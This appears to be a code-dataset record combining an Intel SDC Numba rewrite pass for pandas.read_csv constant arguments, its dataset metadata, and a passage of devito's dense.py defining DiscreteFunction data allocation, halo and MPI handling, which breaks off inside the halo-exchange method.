self.func_ir = func_ir
self.block = block
self.consts = consts = {}
# Find all assignments with a right-hand read_csv() call
for inst in find_operations(block=block, op_name='call'):
expr = inst.value
call = guard(find_callname, func_ir, expr)
if call not in self._pandas_read_csv_calls:
continue
# collect constant parameters with type list and dict
# in order to replace with tuple
for key, var in expr.kws:
if key not in self._read_csv_const_args:
continue
try:
const = func_ir.infer_constant(var)
except errors.ConstantInferenceError:
try:
const = ConstantInference(func_ir).infer_constant(var.name)
except errors.ConstantInferenceError:
continue
if isinstance(const, (list, dict)):
consts.setdefault(inst, {})[key] = const
return len(consts) > 0
def apply(self):
new_block = self.block.copy()
new_block.clear()
vars_to_remove = []
for inst in self.block.body:
if inst in self.consts:
consts = self.consts[inst]
for key, value in consts.items():
if key not in dict(inst.value.kws):
continue
# collecting data from current variable
current_var = [var for name, var in inst.value.kws if name == key][0]
loc = current_var.loc
seq, _ = guard(find_build_sequence, self.func_ir, current_var)
if not seq:
continue
if isinstance(value, list):
items = seq
elif isinstance(value, dict):
items = sum(map(list, seq), [])
else:
continue
# create tuple variable
stmt = make_assign(ir.Expr.build_tuple(items=items, loc=loc), new_block.scope,
self.func_ir, loc, name=f"{key}_tuple")
new_block.append(stmt)
# replace variable in call
inst.value.kws = [(kw[0], stmt.target) if kw[0] == key else kw for kw in inst.value.kws]
# save old variable for removing
vars_to_remove.append(current_var)
new_block.append(inst)
# remove old variables
for var in vars_to_remove:
# unsused variables are removed after new block is created b/c
# remove_unused_recursively should see all del statements of variables
remove_unused_recursively(var, new_block, self.func_ir)
return new_block
|
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from numba.core.rewrites import register_rewrite, Rewrite
from numba.core.ir_utils import find_callname, guard, mk_unique_var
from numba import errors
from numba.core import ir
from numba.core import consts
from sdc.rewrites.ir_utils import remove_unused_recursively, make_assign, find_operations
def find_build_sequence(func_ir, var):
"""Reimplemented from numba.core.ir_utils.find_build_sequence
Added 'build_map' to build_ops list.
"""
from numba.core.ir_utils import (require, get_definition)
require(isinstance(var, ir.Var))
var_def = get_definition(func_ir, var)
require(isinstance(var_def, ir.Expr))
build_ops = ['build_tuple', 'build_list', 'build_set', 'build_map']
require(var_def.op in build_ops)
return var_def.items, var_def.op
class ConstantInference(consts.ConstantInference):
def _infer_expr(self, expr):
if expr.op == 'build_map':
def inf_const(value):
return self.infer_constant(value.name, loc=expr.loc)
return {inf_const(k): inf_const(v) for k, v in expr.items}
return super()._infer_expr(expr)
@register_rewrite('before-inference')
class RewriteReadCsv(Rewrite):
"""
Searches for calls of pandas.read_csv() and replace it with calls of read_csv.
"""
_pandas_read_csv_calls = [
('read_csv', 'pandas'), # for calls like pandas.read_csv()
('read_csv', 'pandas.io.parsers'), # for calls like read_csv = pandas.read_csv, read_csv()
]
_read_csv_const_args = ('names', 'dtype', 'usecols')
def match(self, func_ir, block, typemap, calltypes):
# TODO: 1. save instructions of build_map, build_list for read_csv params
# 2. check that vars are used only in read_csv
# 3. replace vars with build_tuple inplace
self.func_ir = func_ir
self.block = block
self.consts = consts = {}
# Find all assignments with a right-hand read_csv() call
for inst in find_operations(block=block, op_name='call'):
expr = inst.value
call = guard(find_callname, func_ir, expr)
if call not in self._pandas_read_csv_calls:
continue
# collect constant parameters with type list and dict
# in order to replace with tuple
for key, var in expr.kws:
if key not in self._read_csv_const_args:
continue
try:
const = func_ir.infer_constant(var)
except errors.ConstantInferenceError:
try:
const = ConstantInference(func_ir).infer_constant(var.name)
except errors.ConstantInferenceError:
continue
if isinstance(const, (list, dict)):
consts.setdefault(inst, {})[key] = const
return len(consts) > 0
def apply(self):
new_block = self.block.copy()
new_block.clear()
vars_to_remove = []
for inst in self.block.body:
if inst in self.consts:
consts = self.consts[inst]
for key, value in consts.items():
if key not in dict(inst.value.kws):
continue
# collecting data from current variable
current_var = [var for name, var in inst.value.kws if name == key][0]
loc = current_var.loc
seq, _ = guard(find_build_sequence, self.func_ir, current_var)
if not seq:
continue
if isinstance(value, list):
items = seq
elif isinstance(value, dict):
items = sum(map(list, seq), [])
else:
continue
# create tuple variable
stmt = make_assign(ir.Expr.build_tuple(items=items, loc=loc), new_block.scope,
self.func_ir, loc, name=f"{key}_tuple")
new_block.append(stmt)
# replace variable in call
inst.value.kws = [(kw[0], stmt.target) if kw[0] == key else kw for kw in inst.value.kws]
# save old variable for removing
vars_to_remove.append(current_var)
new_block.append(inst)
# remove old variables
for var in vars_to_remove:
# unsused variables are removed after new block is created b/c
# remove_unused_recursively should see all del statements of variables
remove_unused_recursively(var, new_block, self.func_ir)
return new_block
|
en
| 0.672164
|
# ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ***************************************************************************** Reimplemented from numba.core.ir_utils.find_build_sequence Added 'build_map' to build_ops list. Searches for calls of pandas.read_csv() and replace it with calls of read_csv. # for calls like pandas.read_csv() # for calls like read_csv = pandas.read_csv, read_csv() # TODO: 1. save instructions of build_map, build_list for read_csv params # 2. check that vars are used only in read_csv # 3. 
replace vars with build_tuple inplace # Find all assignments with a right-hand read_csv() call # collect constant parameters with type list and dict # in order to replace with tuple # collecting data from current variable # create tuple variable # replace variable in call # save old variable for removing # remove old variables # unsused variables are removed after new block is created b/c # remove_unused_recursively should see all del statements of variables
| 1.314286
| 1
|
devito/types/dense.py
|
fffarias/devito-1
| 199
|
6627583
|
from collections import namedtuple
from ctypes import POINTER, Structure, c_void_p, c_int, cast, byref
from functools import wraps, reduce
from math import ceil
from operator import mul
import numpy as np
import sympy
from psutil import virtual_memory
from cached_property import cached_property
from cgen import Struct, Value
from devito.builtins import assign
from devito.data import (DOMAIN, OWNED, HALO, NOPAD, FULL, LEFT, CENTER, RIGHT,
Data, default_allocator)
from devito.exceptions import InvalidArgument
from devito.logger import debug, warning
from devito.mpi import MPI
from devito.parameters import configuration
from devito.symbolics import FieldFromPointer
from devito.finite_differences import Differentiable, generate_fd_shortcuts
from devito.tools import (ReducerMap, as_tuple, flatten, is_integer,
ctypes_to_cstr, memoized_meth, dtype_to_ctype)
from devito.types.dimension import Dimension
from devito.types.args import ArgProvider
from devito.types.caching import CacheManager
from devito.types.basic import AbstractFunction, Size
from devito.types.utils import Buffer, DimensionTuple, NODE, CELL
__all__ = ['Function', 'TimeFunction', 'SubFunction', 'TempFunction']
RegionMeta = namedtuple('RegionMeta', 'offset size')
class DiscreteFunction(AbstractFunction, ArgProvider, Differentiable):
"""
Tensor symbol representing a discrete function in symbolic equations.
Unlike an Array, a DiscreteFunction carries data.
Notes
-----
Users should not instantiate this class directly. Use Function or
SparseFunction (or their subclasses) instead.
"""
# Required by SymPy, otherwise the presence of __getitem__ will make SymPy
# think that a DiscreteFunction is actually iterable, thus breaking many of
# its key routines (e.g., solve)
_iterable = False
is_Input = True
is_DiscreteFunction = True
_DataType = Data
"""
The type of the underlying data object.
"""
def __init_finalize__(self, *args, **kwargs):
# A `Distributor` to handle domain decomposition (only relevant for MPI)
self._distributor = self.__distributor_setup__(**kwargs)
# Staggering metadata
self._staggered = self.__staggered_setup__(**kwargs)
# Now that *all* __X_setup__ hooks have been called, we can let the
# superclass constructor do its job
super(DiscreteFunction, self).__init_finalize__(*args, **kwargs)
# There may or may not be a `Grid` attached to the DiscreteFunction
self._grid = kwargs.get('grid')
# Symbolic (finite difference) coefficients
self._coefficients = kwargs.get('coefficients', 'standard')
if self._coefficients not in ('standard', 'symbolic'):
raise ValueError("coefficients must be `standard` or `symbolic`")
# Data-related properties and data initialization
self._data = None
self._first_touch = kwargs.get('first_touch', configuration['first-touch'])
self._allocator = kwargs.get('allocator') or default_allocator()
initializer = kwargs.get('initializer')
if initializer is None or callable(initializer):
# Initialization postponed until the first access to .data
self._initializer = initializer
elif isinstance(initializer, (np.ndarray, list, tuple)):
# Allocate memory and initialize it. Note that we do *not* hold
# a reference to the user-provided buffer
self._initializer = None
if len(initializer) > 0:
self.data_with_halo[:] = initializer
else:
# This is a corner case -- we might get here, for example, when
# running with MPI and some processes get 0-size arrays after
# domain decomposition. We touch the data anyway to avoid the
# case ``self._data is None``
self.data
else:
raise ValueError("`initializer` must be callable or buffer, not %s"
% type(initializer))
def __eq__(self, other):
# The only possibility for two DiscreteFunctions to be considered equal
# is that they are indeed the same exact object
return self is other
def __hash__(self):
return id(self)
_subs = Differentiable._subs
def _allocate_memory(func):
"""Allocate memory as a Data."""
@wraps(func)
def wrapper(self):
if self._data is None:
debug("Allocating memory for %s%s" % (self.name, self.shape_allocated))
# Clear up both SymPy and Devito caches to drop unreachable data
CacheManager.clear(force=False)
# Allocate the actual data object
self._data = self._DataType(self.shape_allocated, self.dtype,
modulo=self._mask_modulo,
allocator=self._allocator,
distributor=self._distributor)
# Initialize data
if self._first_touch:
assign(self, 0)
if callable(self._initializer):
if self._first_touch:
warning("`first touch` together with `initializer` causing "
"redundant data initialization")
try:
self._initializer(self.data_with_halo)
except ValueError:
# Perhaps user only wants to initialise the physical domain
self._initializer(self.data)
else:
self.data_with_halo.fill(0)
return func(self)
return wrapper
@classmethod
def __dtype_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dtype = kwargs.get('dtype')
if dtype is not None:
return dtype
elif grid is not None:
return grid.dtype
else:
return np.float32
def __staggered_setup__(self, **kwargs):
"""
Setup staggering-related metadata. This method assigns:
* 0 to non-staggered dimensions;
* 1 to staggered dimensions.
"""
staggered = kwargs.get('staggered', None)
if staggered is CELL:
staggered = self.dimensions
return staggered
def __distributor_setup__(self, **kwargs):
grid = kwargs.get('grid')
# There may or may not be a `Distributor`. In the latter case, the
# DiscreteFunction is to be considered "local" to each MPI rank
return kwargs.get('distributor') if grid is None else grid.distributor
@cached_property
def _functions(self):
return {self.function}
@property
def _data_buffer(self):
"""
Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`,
this *never* returns a view of the data. This method is for internal use only.
"""
return self._data_allocated
@property
def _data_alignment(self):
return self._allocator.guaranteed_alignment
@property
def _mem_external(self):
return True
@property
def grid(self):
"""The Grid on which the discretization occurred."""
return self._grid
@property
def staggered(self):
return self._staggered
@property
def coefficients(self):
"""Form of the coefficients of the function."""
return self._coefficients
@cached_property
def _coeff_symbol(self):
if self.coefficients == 'symbolic':
return sympy.Function('W')
else:
raise ValueError("Function was not declared with symbolic "
"coefficients.")
@cached_property
def shape(self):
"""
Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
"""
return self._shape
@cached_property
def shape_domain(self):
"""
Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
Alias to ``self.shape``.
"""
return self.shape
@cached_property
def shape_with_halo(self):
"""
Shape of the domain+outhalo region. The outhalo is the region
surrounding the domain that may be read by an Operator.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
Further, note that the outhalo of inner ranks is typically empty, while
the outhalo of boundary ranks contains a number of elements depending
on the rank position in the decomposed grid (corner, side, ...).
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._size_outhalo))
_shape_with_outhalo = shape_with_halo
@cached_property
def _shape_with_inhalo(self):
"""
Shape of the domain+inhalo region. The inhalo region comprises the
outhalo as well as any additional "ghost" layers for MPI halo
exchanges. Data in the inhalo region are exchanged when running
Operators to maintain consistent values as in sequential runs.
Notes
-----
Typically, this property won't be used in user code, but it may come
in handy for testing or debugging
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._halo))
@cached_property
def shape_allocated(self):
"""
Shape of the allocated data. It includes the domain and inhalo regions,
as well as any additional padding surrounding the halo.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
"""
return DimensionTuple(*[j + i + k for i, (j, k) in zip(self._shape_with_inhalo,
self._padding)],
getters=self.dimensions)
@cached_property
def shape_global(self):
"""
Global shape of the domain region. The domain constitutes the area of
the data written to by an Operator.
Notes
-----
In an MPI context, this is the *global* domain region shape, which is
therefore identical on all MPI ranks.
"""
if self.grid is None:
return self.shape
retval = []
for d, s in zip(self.dimensions, self.shape):
size = self.grid.dimension_map.get(d)
retval.append(size.glb if size is not None else s)
return tuple(retval)
@property
def size_global(self):
    """
    The global number of elements this object is expected to store in memory.
    Note that this would need to be combined with self.dtype to give the actual
    size in bytes.
    """
    # Product of the global domain sizes across all Dimensions
    return reduce(mul, self.shape_global)

# The inhalo offsets/sizes coincide with the abstract halo definition
_offset_inhalo = AbstractFunction._offset_halo
_size_inhalo = AbstractFunction._size_halo
@cached_property
def _size_outhalo(self):
    """
    Number of points in the outer halo region, as a DimensionTuple of
    (left, right) Size pairs, one entry per Dimension.
    """
    if self._distributor is None:
        # Computational domain is not distributed and hence the outhalo
        # and inhalo correspond
        return self._size_inhalo

    # Clip the inhalo against the global domain bounds: only the part of
    # the halo sticking out of the global domain belongs to the outhalo
    left = [abs(min(i.loc_abs_min-i.glb_min-j, 0)) if i and not i.loc_empty else 0
            for i, j in zip(self._decomposition, self._size_inhalo.left)]
    right = [max(i.loc_abs_max+j-i.glb_max, 0) if i and not i.loc_empty else 0
             for i, j in zip(self._decomposition, self._size_inhalo.right)]

    sizes = tuple(Size(i, j) for i, j in zip(left, right))

    # FIX: this condition previously read `(any(left) > 0 or any(right)) > 0`,
    # i.e. a boolean compared against 0 due to misplaced parentheses. The
    # result was coincidentally equivalent, but misleading; rewritten plainly.
    if self._distributor.is_parallel and (any(left) or any(right)):
        try:
            warning_msg = """A space order of {0} and a halo size of {1} has been
                             set but the current rank ({2}) has a domain size of
                             only {3}""".format(self._space_order,
                                                max(self._size_inhalo),
                                                self._distributor.myrank,
                                                min(self.grid.shape_local))
            if not self._distributor.is_boundary_rank:
                warning(warning_msg)
            else:
                # Restrict the check to the MPI-decomposed Dimensions
                left_dist = [i for i, d in zip(left, self.dimensions) if d
                             in self._distributor.dimensions]
                right_dist = [i for i, d in zip(right, self.dimensions) if d
                              in self._distributor.dimensions]
                for i, j, k, l in zip(left_dist, right_dist,
                                      self._distributor.mycoords,
                                      self._distributor.topology):
                    # Warn only when this boundary rank's halo spills over a
                    # physical boundary of the decomposed topology
                    if l > 1 and ((j > 0 and k == 0) or (i > 0 and k == l-1)):
                        warning(warning_msg)
                        break
        except AttributeError:
            pass

    return DimensionTuple(*sizes, getters=self.dimensions, left=left, right=right)
@property
def size_allocated(self):
    """
    The number of elements this object is expected to store in memory.
    Note that this would need to be combined with self.dtype to give the actual
    size in bytes.
    """
    # Product of the allocated (domain+inhalo+padding) sizes across Dimensions
    return reduce(mul, self.shape_allocated)
@cached_property
def _mask_modulo(self):
"""Boolean mask telling which Dimensions support modulo-indexing."""
return tuple(True if i.is_Stepping else False for i in self.dimensions)
@cached_property
def _mask_domain(self):
    """Slice-based mask to access the domain region of the allocated data."""
    return tuple(slice(i, j) for i, j in
                 zip(self._offset_domain, self._offset_halo.right))

@cached_property
def _mask_inhalo(self):
    """Slice-based mask to access the domain+inhalo region of the allocated data."""
    return tuple(slice(i.left, i.right + j.right) for i, j in
                 zip(self._offset_inhalo, self._size_inhalo))

@cached_property
def _mask_outhalo(self):
    """Slice-based mask to access the domain+outhalo region of the allocated data."""
    # Widen the domain mask by the outhalo on both sides; the
    # `i.stop and ... or None` keeps the slice open-ended when the domain
    # mask itself is open-ended (stop is None)
    return tuple(slice(i.start - j.left, i.stop and i.stop + j.right or None)
                 for i, j in zip(self._mask_domain, self._size_outhalo))
@cached_property
def _decomposition(self):
    """
    Tuple of Decomposition objects, representing the domain decomposition.
    None is used as a placeholder for non-decomposed Dimensions.
    """
    if self._distributor is None:
        # No distributor -> nothing is decomposed
        return (None,)*self.ndim
    mapper = {d: self._distributor.decomposition[d] for d in self._dist_dimensions}
    return tuple(mapper.get(d) for d in self.dimensions)

@cached_property
def _decomposition_outhalo(self):
    """
    Tuple of Decomposition objects, representing the domain+outhalo
    decomposition. None is used as a placeholder for non-decomposed Dimensions.
    """
    if self._distributor is None:
        return (None,)*self.ndim
    # Extend each domain decomposition by the inhalo extents
    return tuple(v.reshape(*self._size_inhalo[d]) if v is not None else v
                 for d, v in zip(self.dimensions, self._decomposition))
@property
def data(self):
    """
    The domain data values, as a numpy.ndarray.

    Elements are stored in row-major format.

    Notes
    -----
    With this accessor you are claiming that you will modify the values you
    get back. If you only need to look at the values, use :meth:`data_ro`
    instead.
    """
    return self.data_domain
def data_gather(self, start=None, stop=None, step=1, rank=0):
    """
    Gather distributed `Data` attached to a `Function` onto a single rank.

    Parameters
    ----------
    rank : int
        The rank onto which the data will be gathered.
    step : int or tuple of ints
        The `slice` step in each dimension.
    start : int or tuple of ints
        The `slice` start in each dimension.
    stop : int or tuple of ints
        The final point of the `slice` to include.

    Notes
    -----
    Alias to ``self.data._gather``.

    Note that gathering data from large simulations onto a single rank may
    result in memory blow-up and hence should use this method judiciously.
    """
    return self.data._gather(start=start, stop=stop, step=step, rank=rank)
@property
@_allocate_memory
def data_domain(self):
    """
    The domain data values.

    Elements are stored in row-major format.

    Notes
    -----
    Alias to ``self.data``.

    With this accessor you are claiming that you will modify the values you
    get back. If you only need to look at the values, use
    :meth:`data_ro_domain` instead.
    """
    # Writable view -> the halo must be re-exchanged before the next read
    self._is_halo_dirty = True
    return self._data._global(self._mask_domain, self._decomposition)

@property
@_allocate_memory
def data_with_halo(self):
    """
    The domain+outhalo data values.

    Elements are stored in row-major format.

    Notes
    -----
    With this accessor you are claiming that you will modify the values you
    get back. If you only need to look at the values, use
    :meth:`data_ro_with_halo` instead.
    """
    self._is_halo_dirty = True
    # Refresh the halo before exposing it to the caller
    self._halo_exchange()
    return self._data._global(self._mask_outhalo, self._decomposition_outhalo)

# Alias: the public `data_with_halo` always refers to the *out*halo
_data_with_outhalo = data_with_halo
@property
@_allocate_memory
def _data_with_inhalo(self):
    """
    The domain+inhalo data values.

    Elements are stored in row-major format.

    Notes
    -----
    This accessor does *not* support global indexing.

    With this accessor you are claiming that you will modify the values you
    get back. If you only need to look at the values, use
    :meth:`data_ro_with_inhalo` instead.

    Typically, this accessor won't be used in user code to set or read data
    values. Instead, it may come in handy for testing or debugging
    """
    self._is_halo_dirty = True
    self._halo_exchange()
    return np.asarray(self._data[self._mask_inhalo])

@property
@_allocate_memory
def _data_allocated(self):
    """
    The allocated data values, that is domain+inhalo+padding.

    Elements are stored in row-major format.

    Notes
    -----
    This accessor does *not* support global indexing.

    With this accessor you are claiming that you will modify the values you
    get back. If you only need to look at the values, use
    :meth:`data_ro_allocated` instead.

    Typically, this accessor won't be used in user code to set or read data
    values. Instead, it may come in handy for testing or debugging
    """
    self._is_halo_dirty = True
    self._halo_exchange()
    return np.asarray(self._data)
def _data_in_region(self, region, dim, side):
"""
The data values in a given region.
Parameters
----------
region : DataRegion
The data region of interest (e.g., OWNED, HALO) for which a view
is produced.
dim : Dimension
The dimension of interest.
side : DataSide
The side of interest (LEFT, RIGHT).
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back.
Typically, this accessor won't be used in user code to set or read
data values.
"""
self._is_halo_dirty = True
offset = getattr(getattr(self, '_offset_%s' % region.name)[dim], side.name)
size = getattr(getattr(self, '_size_%s' % region.name)[dim], side.name)
index_array = [
slice(offset, offset+size) if d is dim else slice(pl, s - pr)
for d, s, (pl, pr)
in zip(self.dimensions, self.shape_allocated, self._padding)
]
return np.asarray(self._data[index_array])
@property
@_allocate_memory
def data_ro_domain(self):
    """Read-only view of the domain data values."""
    view = self._data._global(self._mask_domain, self._decomposition)
    # Read-only view -> no need to mark the halo as dirty
    view.setflags(write=False)
    return view

@property
@_allocate_memory
def data_ro_with_halo(self):
    """Read-only view of the domain+outhalo data values."""
    view = self._data._global(self._mask_outhalo, self._decomposition_outhalo)
    view.setflags(write=False)
    return view

# Alias: the public `data_ro_with_halo` always refers to the *out*halo
_data_ro_with_outhalo = data_ro_with_halo

@property
@_allocate_memory
def _data_ro_with_inhalo(self):
    """
    Read-only view of the domain+inhalo data values.

    Notes
    -----
    This accessor does *not* support global indexing.
    """
    view = self._data[self._mask_inhalo]
    view.setflags(write=False)
    return np.asarray(view)

@property
@_allocate_memory
def _data_ro_allocated(self):
    """
    Read-only view of the domain+inhalo+padding data values.

    Notes
    -----
    This accessor does *not* support global indexing.
    """
    view = self._data
    view.setflags(write=False)
    return np.asarray(view)
@cached_property
def local_indices(self):
    """
    Tuple of slices representing the global indices that logically
    belong to the calling MPI rank.

    Notes
    -----
    Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using
    MPI this property will return ``(slice(0, nx), slice(0, ny))``. On
    the other hand, when MPI is used, the local ranges depend on the domain
    decomposition, which is carried by ``self.grid``.
    """
    if self._distributor is None:
        return tuple(slice(0, s) for s in self.shape)
    else:
        # Dimensions unknown to the distributor fall back to the full range
        return tuple(self._distributor.glb_slices.get(d, slice(0, s))
                     for s, d in zip(self.shape, self.dimensions))
@cached_property
def space_dimensions(self):
    """Tuple of Dimensions defining the physical space."""
    return tuple(d for d in self.dimensions if d.is_Space)

@cached_property
def _dist_dimensions(self):
    """Tuple of MPI-distributed Dimensions."""
    if self._distributor is None:
        return ()
    return tuple(d for d in self.dimensions if d in self._distributor.dimensions)
@property
def initializer(self):
    # If data has already been allocated, expose it (halo included) as the
    # initializer; otherwise return the user-provided (possibly lazy) one
    if self._data is not None:
        return self.data_with_halo.view(np.ndarray)
    else:
        return self._initializer
# C-level representation: a DiscreteFunction is passed to generated code as a
# pointer to a `struct dataobj`, carrying the raw data pointer plus the
# size/offset metadata of each data region
_C_structname = 'dataobj'
_C_typename = 'struct %s *' % _C_structname
_C_field_data = 'data'              # raw data pointer
_C_field_size = 'size'              # allocated size, per Dimension
_C_field_nopad_size = 'npsize'      # size without padding, per Dimension
_C_field_domain_size = 'dsize'      # domain size, per Dimension
_C_field_halo_size = 'hsize'        # (left, right) halo sizes, per Dimension
_C_field_halo_ofs = 'hofs'          # (left, right) halo offsets, per Dimension
_C_field_owned_ofs = 'oofs'         # (left, right) owned-region offsets, per Dimension

# cgen declaration of the struct, emitted in the generated C code
_C_typedecl = Struct(_C_structname,
                     [Value('%srestrict' % ctypes_to_cstr(c_void_p), _C_field_data),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_size),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_nopad_size),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_domain_size),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_size),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_ofs),
                      Value(ctypes_to_cstr(POINTER(c_int)), _C_field_owned_ofs)])

# Matching ctypes Structure, built dynamically so the field layout stays in
# sync with `_C_typedecl`
_C_ctype = POINTER(type(_C_structname, (Structure,),
                        {'_fields_': [(_C_field_data, c_void_p),
                                      (_C_field_size, POINTER(c_int)),
                                      (_C_field_nopad_size, POINTER(c_int)),
                                      (_C_field_domain_size, POINTER(c_int)),
                                      (_C_field_halo_size, POINTER(c_int)),
                                      (_C_field_halo_ofs, POINTER(c_int)),
                                      (_C_field_owned_ofs, POINTER(c_int))]}))
def _C_make_dataobj(self, data):
    """
    A ctypes object representing the DiscreteFunction that can be passed to
    an Operator.
    """
    dataobj = byref(self._C_ctype._type_())
    dataobj._obj.data = data.ctypes.data_as(c_void_p)
    dataobj._obj.size = (c_int*self.ndim)(*data.shape)
    # MPI-related fields
    dataobj._obj.npsize = (c_int*self.ndim)(*[i - sum(j) for i, j in
                                              zip(data.shape, self._size_padding)])
    dataobj._obj.dsize = (c_int*self.ndim)(*self._size_domain)
    # (left, right) pairs are flattened -> 2*ndim entries
    dataobj._obj.hsize = (c_int*(self.ndim*2))(*flatten(self._size_halo))
    dataobj._obj.hofs = (c_int*(self.ndim*2))(*flatten(self._offset_halo))
    dataobj._obj.oofs = (c_int*(self.ndim*2))(*flatten(self._offset_owned))
    # stash a reference to the array on _obj, so we don't let it get freed
    # while we hold onto _obj
    dataobj._obj.underlying_array = data
    return dataobj
def _C_as_ndarray(self, dataobj):
    """Cast the data carried by a DiscreteFunction dataobj to an ndarray."""
    shape = tuple(dataobj._obj.size[i] for i in range(self.ndim))
    # Reinterpret the raw void* as a flat C array, then wrap it (zero-copy)
    # into an ndarray of the proper shape and dtype
    ctype_1d = dtype_to_ctype(self.dtype) * int(reduce(mul, shape))
    buf = cast(dataobj._obj.data, POINTER(ctype_1d)).contents
    return np.frombuffer(buf, dtype=self.dtype).reshape(shape)
@memoized_meth
def _C_make_index(self, dim, side=None):
    """
    Index of `dim` (optionally of its left/right `side`) into the flattened
    dataobj metadata arrays.
    """
    # Depends on how fields are populated in `_C_make_dataobj`
    idx = self.dimensions.index(dim)
    if side is not None:
        # (left, right) pairs are flattened: even slot = left, odd = right
        idx = idx*2 + (0 if side is LEFT else 1)
    return idx
@memoized_meth
def _C_get_field(self, region, dim, side=None):
    """
    Symbolic representation of a given data region.

    Returns a RegionMeta carrying the (offset, size) of `region` along `dim`
    (and `side`, where meaningful), expressed as accesses into the C-level
    dataobj struct fields.
    """
    # Field access `f[i]` through the struct pointer carried by `_C_symbol`
    ffp = lambda f, i: FieldFromPointer("%s[%d]" % (f, i), self._C_symbol)
    if region is DOMAIN:
        offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
        size = ffp(self._C_field_domain_size, self._C_make_index(dim))
    elif region is OWNED:
        if side is LEFT:
            # Left-owned width equals the neighbor's right halo depth
            offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
        elif side is CENTER:
            # Note: identical to region=HALO, side=CENTER
            offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_domain_size, self._C_make_index(dim))
        else:
            offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, RIGHT))
            size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
    elif region is HALO:
        if side is LEFT:
            offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
        elif side is CENTER:
            # Note: identical to region=OWNED, side=CENTER
            offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_domain_size, self._C_make_index(dim))
        else:
            offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, RIGHT))
            size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
    elif region is NOPAD:
        offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
        size = ffp(self._C_field_nopad_size, self._C_make_index(dim))
    elif region is FULL:
        offset = 0
        size = ffp(self._C_field_size, self._C_make_index(dim))
    else:
        raise ValueError("Unknown region `%s`" % str(region))

    return RegionMeta(offset, size)
def _halo_exchange(self):
    """Perform the halo exchange with the neighboring processes."""
    if not MPI.Is_initialized() or MPI.COMM_WORLD.size == 1:
        # Nothing to do
        return
    if MPI.COMM_WORLD.size > 1 and self._distributor is None:
